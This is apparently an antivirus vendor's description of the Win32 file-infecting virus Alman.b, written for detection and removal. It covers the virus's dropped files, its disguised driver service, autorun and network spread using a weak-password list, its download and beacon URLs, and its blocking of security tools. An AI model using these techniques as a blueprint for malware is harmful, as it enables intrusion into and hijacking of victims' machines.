Virus.Win32.Alman.b
Detect: Virus.Win32.Alman.b
Platform: Win32
Type: Virus
Virus body size: ~38 KB
Summary
It is a malware which infects executable PE-EXE files.
Technical Details
Installation
Being activated, the virus extracts a dynamic library (DLL) from its body to the Windows root catalog under the "linkinfo.dll" name:
%Windir%\linkinfo.dll
The file is 46592 bytes in size.
md5: 38FEE4EC44DF464D5C998629498D6176
In addition, it extracts the following driver from its body:
%System%\drivers\nvmini.sys
The driver is preliminarily saved in the temporary file under the "IsDrv118.sys" name:
%System%\drivers\IsDrv118.sys
The program is implemented as an NT core driver (kernel mode driver). It is 17152 bytes in size.
md5: 01F4112EE9F2E11B8E952E4FF026B319
To launch a created driver, the virus creates a service with the "nvmini" name which is launched on each system startup:
[HKLM\SYSTEM\CurrentControlSet\Services\nvmini]
"DisplayName" = "NVIDIA Compatible Windows Miniport Driver"
"ImagePath" = "%System%\drivers\nvmini.sys"
"Group" = "Pointer Port"
"ErrorControl" = "0"
"Start" = "2"
"Type" = "1"
Propagation
The virus copies its executable file to all logical and removable disks under the "boot.exe" name:
X:\boot.exe
md5: 54a821b720f0088789e3a98776c5fdd3
Then, the virus creates an "autorun.inf" file in the root directory of each catalog:
X:\autorun.inf
which runs the virus executable file each time the user opens an infected disk by Windows Explorer,
where <X> – a disk letter.
The worm set a “hidden” attribute for all created files.
To infect files across the network, the virus attempts to connect to the remote machines using the "Administrator" account and one of the following passwords:
password1
monkey
password
abc123
qwerty
letmein
root
mypass123
owner
test123
love
admin123
qwer
!@#$%^&*()
!@#$%^&*(
!@#$%^&*
!@#$%^& !@#$%^
!@#$%
asdfgh
asdf
!@#$
654321
123456789
12345
Aaa
123
111
1
admin
Afterwards, it copies itself to the remote machine as "setup.exe":
C$\setup.exe
File Infection
The virus injects the "%Windir%\linkinfo.dll" library code to the explorer.exe process address space. The injected code scans available logic and network drives as well as USB flash drives to search for files that can be infected and infects them.
While infecting, the virus expands the last PE-section of the file being infected and copies its encrypted body to the directory. Afterwards, it redirects the entry point of the program to its body.
The virus infects all Windows (PE-EXE) executable files. Files with the following extensions are not infected:
wooolcfg.exe
woool.exe
ztconfig.exe
patchupdate.exe
trojankiller.exe
xy2player.exe
flyff.exe
xy2.exe
au_unins_web.exe
cabal.exe
cabalmain9x.exe
cabalmain.exe
meteor.exe
patcher.exe
mjonline.exe
config.exe
zuonline.exe
userpic.exe
main.exe
dk2.exe
autoupdate.exe
dbfsupdate.exe
asktao.exe
sealspeed.exe
xlqy2.exe
game.exe
wb-service.exe
nbt-dragonraja2006.exe
dragonraja.exe
mhclient-connect.exe
hs.exe
mts.exe
gc.exe
zfs.exe
neuz.exe
maplestory.exe
nsstarter.exe
nmcosrv.exe
ca.exe
nmservice.exe
kartrider.exe
audition.exe
zhengtu.exe
System Infection Detection
It is possible to detect a hidden driver in the system with the help of the GMER AntiRootkit:
Payload
To control the uniqueness of its process in the system, the virus creates a unique identifier with the following name
PNP#DMUTEX#1#DL5
It ends the other malicious program processes and deletes their files from a hard drive:
sxs.exe
lying.exe
logo1_.exe
logo_1.exe
fuckjacks.exe
spoclsv.exe
nvscv32.exe
svch0st.exe
c0nime.exe
iexpl0re.exe
ssopure.exe
upxdnd.exe
wdfmgr32.exe
spo0lsv.exe
ncscv32.exe
iexplore.exe
iexpl0re.exe
ctmontv.exe
explorer.exe
internat.exe
lsass.exe
smss.exe
svhost32.exe
rundl132.exe
msvce32.exe
rpcs.exe
sysbmw.exe
tempicon.exe
sysload3.exe
run1132.exe
msdccrt.exe
wsvbs.exe
cmdbcs.exe
realschd.exe
With that, these files cannot be located in the following catalogs:
\WINNT\
\WINDOWS\
LOCAL SETTINGS\TEMP\
Visiting the following URL, the virus gets a list of files to be downloaded from the Internet:
http://ftp.db***829.info/ok.gif
The URL did not respond when the description was created.
The virus downloads files available in the list and saves them to the temporary folder for the current user. Then, the virus launches the files for execution.
It informs an intruder about free space available on the local disk (C:), OS and Internet Explorer versions, as well as inform whether antivirus software is installed on PC.
The information is sent using parameters of the following HTTP request to the intruder server:
http://info.s***1.com/xxx.asp?action=post&HD=< free space percentage>&OT=<os version>&IV=<IE version>&AV=<drivers installed>
In addition, the virus can get its updated file from the intruder site. It saves the file to the following catalog with the "AcLue.dll" name:
%WinDir%\AppPatch\AcLue.dll
The virus hides its files using the "%System%\drivers\nvmini.sys" driver:
nvmini.sys
linkinfo.dll
autorun.inf
boot.exe
blocks deleting a system registry key that runs a "nvmini" service as well as blocks downloading drivers with the following names:
ISPUBDRV
ISDRV1
RKREVEAL
PROCEXP
SAFEMON
RKHDRV10
NPF
IRIS
NPPTNT
DUMP_WMIMMC
SPLITTER
EAGLENT
substitutes processors of the following functions in KeServiceDescriptorTable:
NtDeleteKey
NtDeleValueKey
NtEnumerateKey
NtQueryDirectoryFile
NtLoadDriver
The virus installs system notifiers which block the processes loading the following DLL:
UPXDHND.DLL
CMDBCS.DLL
WSVBS.DLL
MDDDSCCRT.DLL
RUND11.DLL
LGSYM.DLL
RDSHOST.DLL
RDFHOST.DLL
RDIHOST.DLL
RPCS.DLL
NOTEPAD.DLL
DLLHOSTS.DLL
WINDHCP.DLL
RICHDLL.DLL
DLLWM.DLL
Removal Recommendations
- Delete the registry key (How to Work with System Registry):
- Delete the following files:
- Delete all virus copies from the hard drive.
- Run a full scan of your computer using the Antivirus program with the updated definition database (Download Ad-Aware Free).
[HKLM\SYSTEM\CurrentControlSet\Services\nvmini]
"DisplayName" = "NVIDIA Compatible Windows Miniport Driver"
"ImagePath" = "%System%\drivers\nvmini.sys"
"Group" = "Pointer Port"
"ErrorControl" = "0"
"Start" = "2"
"Type" = "1"
%Windir%\linkinfo.dll
%System%\drivers\nvmini.sys
%System%\drivers\IsDrv118.sys
X:\boot.exe
X:\autorun.inf
C$\setup.exe
%WinDir%\AppPatch\AcLue.dll
